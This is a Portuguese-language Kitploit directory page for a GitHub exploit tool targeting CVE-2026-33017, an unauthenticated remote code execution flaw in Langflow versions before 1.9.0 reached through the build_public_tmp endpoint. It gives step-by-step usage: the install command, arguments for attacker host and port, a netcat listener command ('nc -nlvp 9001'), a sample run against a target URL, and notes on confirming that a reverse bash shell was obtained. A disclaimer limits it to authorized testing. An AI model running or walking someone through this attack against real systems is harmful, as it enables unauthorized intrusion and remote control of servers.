Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-33017-Exploit — Exploração para execução remota de código não autenticada no Langflow <1.9.0 via endpoint build_public_tmp, entregando um shell reverso para testes de penetração autorizados. | Kitploit
Ferramentas/GitHubGitHub/diamorphine666/cve-2026-33017-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubdiamorphine666/cve-2026-33017-exploit

CVE-2026-33017-Exploit

Exploração para execução remota de código não autenticada no Langflow <1.9.0 via endpoint build_public_tmp, entregando um shell reverso para testes de penetração autorizados.

Ver Repositório
2há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit Fireflow RCE

Execução Remota de Código para Langflow através do endpoint build_public_tmp.
Exploração via endpoint público de construção de fluxo que executa uma shell reversa no alvo.

Requisitos

  • Python 3.8+
  • Biblioteca httpx

Instalar:

root@kitploit:~
pip install httpx

Uso

root@kitploit:~
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>

Argumentos

  • -u, --url : URL base da instância Langflow (ex.: https://flow.example.com/)
  • -l, --lhost : Seu endereço IP para receber a shell reversa
  • -p, --lport : Porta de escuta para a shell reversa
  • -f --flow-id : ID do fluxo alvo (obrigatório – obter de /api/v1/flows/ ou da interface)
  • -c --client-id : Valor do cookie client_id para identificação de sessão
  • Exemplo

    1. Inicie um listener:

      root@kitploit:~
      nc -nlvp 9001
      
    2. Execute o exploit:

      root@kitploit:~
      python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
      
    3. Se bem-sucedido, você receberá uma shell bash interativa.

    Notas Importantes

    • ReadTimeout é normal – o servidor pode não responder porque a shell bloqueia a requisição HTTP. Desde que você veja uma conexão no seu listener, o exploit funcionou.
    • Um flow-id válido é necessário. Liste todos os fluxos via GET /api/v1/flows ou copie da URL do navegador.
    • Esta ferramenta destina-se apenas a testes de penetração autorizados e fins educacionais. Não utilize contra sistemas sem permissão explícita.

    Versões Afetadas

    • Versões do Langflow anteriores à correção para RCE em componente personalizado <1.9.0

    Licença

    MIT – para pesquisa educacional e ética em segurança.

    Baixar ferramenta